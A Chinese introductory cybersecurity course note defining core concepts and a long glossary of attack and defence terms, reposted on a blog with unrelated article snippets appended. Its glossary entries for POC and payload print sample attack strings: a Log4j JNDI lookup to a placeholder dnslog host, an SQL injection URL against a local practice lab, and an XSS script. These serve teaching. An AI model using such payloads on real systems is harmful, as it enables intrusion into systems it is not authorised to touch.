第一阶段--Day1--什么是网络安全?网络安全常用术语

目录

1. 什么是网络安全?

信息系统(Information System)

信息系统安全三要素(CIA)

网络空间安全管理流程

网络安全管理

2. 网络安全的常用术语

3. 网络安全形势

4. 中国网络安全产业现状


1. 什么是网络安全?

        网络空间安全包括了国家安全、城市安全、经济安全、社会安全、生产安全、人身安全等在内的“大安全”。

信息系统(Information System)

        是由计算机硬件网络通信设备计算机软件信息资源信息用户规章制度组成的以处理信息流为目的的人机一体化系统。

信息系统安全三要素(CIA)

  • 保密性(Confidentiality)
  • 完整性(Integrity)
  • 可用性(Availability)

网络空间安全管理流程

  1. 确定网络信息安全管理对象
  2. 评估网络信息安全管理对象的价值
  3. 识别网络信息安全管理对象的威胁
  4. 识别网络信息安全管理对象的脆弱性
  5. 确定网络信息安全管理对象的风险级别
  6. 制定网络信息安全防范体系及防范措施实施和落实网络信息安全防范措施
  7. 运行/维护网络信息安全设备、配置

网络安全管理

  • 《中华人民共和国网络安全法》
  • 《Cybersecurity Law of the People's Republic of China》

2. 网络安全的常用术语

黑客(hacker)对计算机技术非常擅长的人,窃取数据、破坏计算机系统。
脚本小子刚刚入门安全行业,学习了一些技术,只会用现成的工具或者从网上复制代码。
白帽子

· 白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题。

· 360补天、漏洞盒子、CNVD、CNNVD

红帽黑客有正义感、爱国的黑客。利用技术维护国家网络安全,并且对外来的攻击进行反击。

漏洞(vulnerability)

· 漏洞指的是硬件、软件协议等等存在的安全缺陷

· https://www.cnnvd.org.cn/web/wz/bzxqByld.tag?id=3&mkid=3

POC

· Proof of Concept

· 能证明漏洞存在的代码

· 例:${jndi:ldap://xxxxxx.dnslog.cn/test}

EXP

· Exploit--利用

· 执行了这一段利用代码之后,就能够达到攻击的目的。

Payload(攻击载荷)

· SQL注入--http://localhost/sqli-labs/Less-3/?id=-1')union select 1.l.database()--+

· XSS--<script>alert(1)</script>

· log4j--${jndi:ldap://xxxxxx.dnslog.cn/test}

0day漏洞已经被发现了(还没有公开),官方还没有发布补丁或者修复方法的漏洞。【危害力很大】
1day

漏洞的POC和EXP已经被公开了,但是很多人还来不及修复这个叫做1day漏洞。 

Nday漏洞

指已经发布官方补丁的漏洞,并且时间已经过去很久的漏洞。

漏扫基于数据库对漏洞进行自动化扫描。
补丁(patch)漏洞的修复程序。
渗透(penetration)

黑客入侵了网站或者计算机系统,获取控制计算机权限的过程。

渗透测试

(penetration test)

用黑客入侵的方式对系统进行安全测试,目的是找出和修复安全漏洞,在这个过程中不会影响系统的正常运行,也不会破坏数据。

木马

(Trojan horse)

隐藏在计算机中的恶意程序。
病毒(Virus)恶意代码程序。
杀毒软件瑞星、江民、金山、国外的诺顿、卡巴斯基、McAfee、360
免杀绕过杀毒软件。
肉鸡已经被黑客获得的控制权限的机器,可能是个人电脑也可能是企业或者单位的服务器,通常情况下因为使用者不知道已经被入侵,所以黑客可以长期获得权限和控制。
抓鸡利用出现概率非常高的漏洞(比如log4j、永恒之蓝),使用自动化方式获取肉鸡的行为。
跳板机黑客为了防止被追溯和识别身份,一般不会用自己的电脑发起攻击,而是利用获取到的肉鸡来攻击其他目标,这个肉鸡就充当一个跳板的角色。
DDos

· Distributed Denial of Service

· 分布式拒绝服务攻击

· 发起大量恶意请求,导致正常用户无法访问。

后门(backdoor)黑客为了对主机进行长期的控制,在机器上种植一段程序或留下一个“入口”。

中间人攻击(MITM)

· Man-in-the-Middle Attack

· MITM攻击

· 运行中间服务器,拦截并篡改数据

网络钓鱼

钓鱼网站指的是冒充的网站,用来窃取用户的账号密码。
webshell

· shell是一种命令执行工具,可以对计算机进行控制。

· webshell就是asp、php、jsp之外的web代码文件,通过这些代码文件可以执行任意的命令,对计算机做任意的操作。

Getshell

· 获得命令执行环境的操作。

· Redis的持久化功能、MySQL的写文件功能,MySQL的日志记录功能、上传功能、数据备份功能、编辑器。

提权(Privilege Escalation)

· 权限提升

· 普通用户权限,把自己提升为管理员权限的擦欧总就叫做提权。

拿站指得到一个网站的最高权限,即得到后台和管理员名字和密码。
拖库(脱裤)托库指的是网站被入侵以后,黑客把全部的数据都导出,窃取到了数据文件。
撞库用获得的裤子去批量登录其他网站。
旁站入侵

入侵服务器的其他网站。

横向移动攻击者入侵一台服务器成功以后,基于内部网络,继续入侵同网段的其他机器。
代理(Proxy)帮我们发起网络请求的一台服务器。
VPN

· Virtual Peivate Network

· 代理

· 加密通信

· 办公--在家里连接到公司内网

蜜罐(Honeypot)吸引攻击者攻击的伪装系统,用来实现溯源和反制。
沙箱(Sandbox)

· 沙箱是一种按照安全策略限制程序行为的执行环境,就算又恶意代码,也只能影响沙箱环境而不会影响到操作系统。 (360安全浏览器--带沙箱功能)

· 微步在线云沙箱:https://s.threatbook.com/

靶场

· 模拟的有漏洞的环境

· 可以是网站、容器、操作系统

堡垒机

· 跳板机--jumpserver

· 运维审计系统--管理资源,审批、审计、访问控制、事件记录

WAF

· Web Application Firewall

· Web应用防火墙。

· 对HTTP/HTTPS的流量内容进行分析,拦截恶意攻击行为。

· WAF使用场景:例如服务器中有些安全性比较差的应用程序,审计和修改全部代码比较麻烦,这时候最好的办法就似乎通过部署WAF来实现安全防护。

· WAF可以防护的常见风险包括:SQL注入、XSS、利用本地/远程文件包含漏洞进行攻击、PHP代码注入、黑客扫描网站,源代码/错误信息泄露等等。

APT攻击

· Advanced Persistent Threat

· 高级可持续威胁攻击,指某组织在网络上对特定对象展开的持续有效的攻击活动。

· 2021深信服APT攻防趋势半年洞察。

护网国家组织牵头组织事业单位,国企单位,名企单位等开展攻防两方的网络安全演习。
CTF

CVE

· Common Vulnerabilities and Exposures--通用漏洞披露

· Mitre

· 例如:CVE-2021-4422/

· CVE Website

CNVD

· 国家信息安全漏洞共享平台--https://www.cnvd.org.cn/

· 国家计算机应激响应中心  CNCERT维护--国家互联网应急中心

 应急响应一个公司为了应对各种安全时间所做的准备和事后采取的措施。

SRC

· Security Response Center---企业的应急响应中心

· SRCs|安全应急响应中心 - 0xsafe

公益SRC

· 漏洞盒子 - 中国领先的漏洞平台与白帽社区|安全众测与安全运营服务平台

· 教育漏洞报告平台(EDUSRC)

网络空间测绘

· 网络空间资源收录

ATT&CK

· 风险分析模型--收集威胁情报,模拟APT攻击

逆向(Reverse)· 把程序还原为源代码,分析程序的运行过程
DevOps

· Development +Operations--安全开发与运维

· 开发测试运维一体化

CICD
等保

· 网络安全等级保护

· 要求相关行业单位和公司的信息系统必须进行定级,然后再公安机关备案,然后建设整改,然后由测评机构评级,并且持续维护和监督。

3. 网络安全形势

        FireEye网络威胁地图:

                https://www.fireeye.com/cyber-map/threat-map.html

        卡巴斯基实时威胁地图:

                地图 | 卡巴斯基网络威胁实时地图

        安全事件分类:GBZ20986-2007《信息安全技术 信息安全事件分类分级指南》

4. 中国网络安全产业现状

        安全产业:
                中国网络安全行业全景图(2020年3月第七版).pdf

                CCSIP 2021中国网络安全产业全景图第三版final.pdf

                2021年网络安全产业分析报告V1.020211011
                

                2021年网络安全产业态势总结

                        https://www.secrss.com/articles/38043

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/4798.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

JFormDesigner 替换自定义类对象, code generation , custom creation code

JFormDesigner 文件的右侧 Code Generation -> Custom Creation Code 编辑写入 自定义的类对象

【一步一步了解Java系列】:探索Java基本类型与C语言的区别

看到这句话的时候证明&#xff1a;此刻你我都在努力~ 加油陌生人~ 个人主页&#xff1a; Gu Gu Study ​​ 专栏&#xff1a;一步一步了解Java 喜欢的一句话&#xff1a; 常常会回顾努力的自己&#xff0c;所以要为自己的努…

C++初阶之类和对象(下)

一、构造函数 1、构造函数体赋值 在创建对象时&#xff0c;编译器通过调用构造函数&#xff0c;给对象中各个成员变量一个合适的初始值。 class Date { public:Date(int year, int month, int day){_year year;_month month;_day day;} private:int _year;int _month;int _…

Java对象在堆和栈上的存储(对象布局,待完善)

0、前言 这里提到的 Java 对象不仅仅包含引用类型&#xff08;Object&#xff09;&#xff0c;还包含基本数据类型&#xff08;boolean、int、long、float、double&#xff09;。文中部分图片来源于 B站 黑马程序员。 1、在栈上的数据存储 1.1、局部变量 局部变量包含以下情…

2024最新docker部署gitlab

docker部署gitlab 快速命令 1 拉取镜像 docker pull gitlab/gitlab-ce2 启动容器 docker run -itd \-p 9980:80 \-p 9922:22 \-v /opt/soft/docker/gitlab/etc:/etc/gitlab \-v /opt/soft/docker/gitlab/log:/var/log/gitlab \-v /opt/soft/docker/gitlab/opt:/var/opt/g…

Vite proxy-rewrite 属性详解

在前端开发中&#xff0c;为了避免跨域问题&#xff0c;我们会在vite.config.ts 中配置如下问题 rewrite: 由于不了解Nginx的知识&#xff0c;这个属性一直困扰着我&#xff0c;这个重写有啥用&#xff0c;加和不加有啥影响 server: {host: 0.0.0.0,proxy: {/api: {target: ht…

操作系统安全:安全审计,Windows系统日志详解,Windows事件ID汇总

「作者简介」&#xff1a;2022年北京冬奥会网络安全中国代表队&#xff0c;CSDN Top100&#xff0c;就职奇安信多年&#xff0c;以实战工作为基础对安全知识体系进行总结与归纳&#xff0c;著作适用于快速入门的 《网络安全自学教程》&#xff0c;内容涵盖系统安全、信息收集等…

从零开始安装 stable diffusion webui v1.9.3 (windows10)

从零开始安装 stable diffusion webui v1.9.3 (windows10) CUDA 安装 CUDA 12.1 | https://developer.nvidia.com/cuda-toolkit-archive CUDNN 8.x | https://developer.nvidia.com/rdp/cudnn-archive 安装路径 F:/CUDA/v12.1 安装git git官网 | https://git-scm.com/ 安…

数据结构-二叉搜索树(BST)

目录 什么是二叉搜索树 二叉搜索树的特性 (1)顺序性 (2)局限性 二叉搜索树的应用 二叉搜索树的操作 (1)查找节点 (2)插入节点 (3)删除节点 (4)中序遍历 什么是二叉搜索树 如图所示&#xff0c;二叉搜索树&#xff08;binary search tree&#xff09;满足以下条件。…

【EI会议|稳定检索】2024年航空航天、空气动力学与自动化工程国际会议(ICAAAE 2024)

2024 International Conference on Aerospace, Aerodynamics, and Automation Engineering 一、大会信息 会议名称&#xff1a;2024年航空航天、空气动力学与自动化工程国际会议 会议简称&#xff1a;ICAAAE 2024 收录检索&#xff1a;提交Ei Compendex,CPCI,CNKI,Google Schol…

WebGL开发框架比较

WebGL开发框架提供了一套丰富的工具和API&#xff0c;使得在Web浏览器中创建和操作3D图形变得更加容易。以下是一些流行的WebGL开发框架及其各自的优缺点。北京木奇移动技术有限公司&#xff0c;专业的软件外包开发公司&#xff0c;欢迎交流合作。 1.Three.js 优点&#xff1a…

装饰器模式、代理模式、适配器模式对比

装饰器模式、代理模式和适配器模式都是结构型设计模式&#xff0c;它们的主要目标都是将将类或对象按某种布局组成更大的结构&#xff0c;使得程序结构更加清晰。这里将装饰器模式、代理模式和适配器模式进行比较&#xff0c;主要是因为三个设计模式的类图结构相似度较高、且功…

VitePress 构建的博客如何部署到 github 平台?

VitePress 构建的博客如何部署到 github 平台&#xff1f; 1. 新建 github 项目 2. 构建 VitePress 项目 2.1. 设置 config 中的 base 由于我们的项目名称为 vite-press-demo&#xff0c;所以我们把 base 设置为 /vite-press-demo/&#xff0c;需注意前后 / export default…

Docker容器:搭建LNMP架构

目录 前言 1、任务要求 2、Nginx 镜像创建 2.1 建立工作目录并上传相关安装包 2.2 编写 Nginx Dockerfile 脚本 2.3 准备 nginx.conf 配置文件 2.4 生成镜像 2.5 创建 Nginx 镜像的容器 2.6 验证nginx 3、Mysql 镜像创建 3.1 建立工作目录并上传相关安装包 3.2 编写…

java案例-读取xml文件

需求 导入依赖 <dependencies><!-- dom4j --><dependency><groupId>dom4j</groupId><artifactId>dom4j</artifactId><version>1.6.1</version></dependency> </dependencies>代码 SAXReader saxReade…

进迭时空宣布开源RISC-V芯片的AI核心技术

仟江水商业电讯&#xff08;4月29日 北京 委托发布&#xff09;4月29日&#xff0c;在“创芯生生不息——进迭时空2024年度产品发布会”上&#xff0c;进迭时空CEO、创始人&#xff0c;陈志坚博士宣布将开源进迭时空在自研RISC-V AI CPU上的核心技术&#xff0c;包括AI扩展指令…

无人机+集群组网+单兵图传:空地一体化组网技术详解

空地一体化组网技术是一种结合了无人机、集群自组网和单兵图传等多种技术的先进通信解决方案。这种技术方案的主要目的是在前线事故现场和后方指挥中心之间建立一个高效、稳定的通信链路&#xff0c;以确保信息的实时传输和指挥的顺畅进行。 首先&#xff0c;前端视频采集部分&…

自适应信号处理基础及应用——DSP学习笔记五

本专栏的图片内容都来自于老师讲课的PPT&#xff0c;本篇博客只是我个人对于上课内容的知识结构分析和梳理。 导论 自适应系统的定义、特征、形式、举例 特征 非自适应系统 • 固定参数的设计方法 • 假定事先知道了一切可能的输入条件&#xff1b;在这些条件下怎样动作&#…

word 表格 文字 上下居中

问题 word 表格 文字 上下居中 详细问题 笔者进行word 文档编辑&#xff0c;对于表格中的文本内容&#xff0c;如何进行上下居中&#xff1f; 解决方案 步骤1、选中需要进行操作的单元格 步骤2、右键 → \rightarrow →点击表格属性 步骤3、依次点击单元格 → \rightar…

Qt绘图与图形视图之自定义图元实现拖拽、拉伸、旋转功能

往期回顾 Qt绘图与图形视图之移动鼠标手动绘制任意多边形的简单介绍-CSDN博客 Qt绘图与图形视图之场景、视图架构的简单介绍-CSDN博客 Qt绘图与图形视图之基本图元绘制的简单介绍-CSDN博客 Qt绘图与图形视图之自定义图元实现拖拽、拉伸、旋转功能 一、最终效果 实现对自定义图…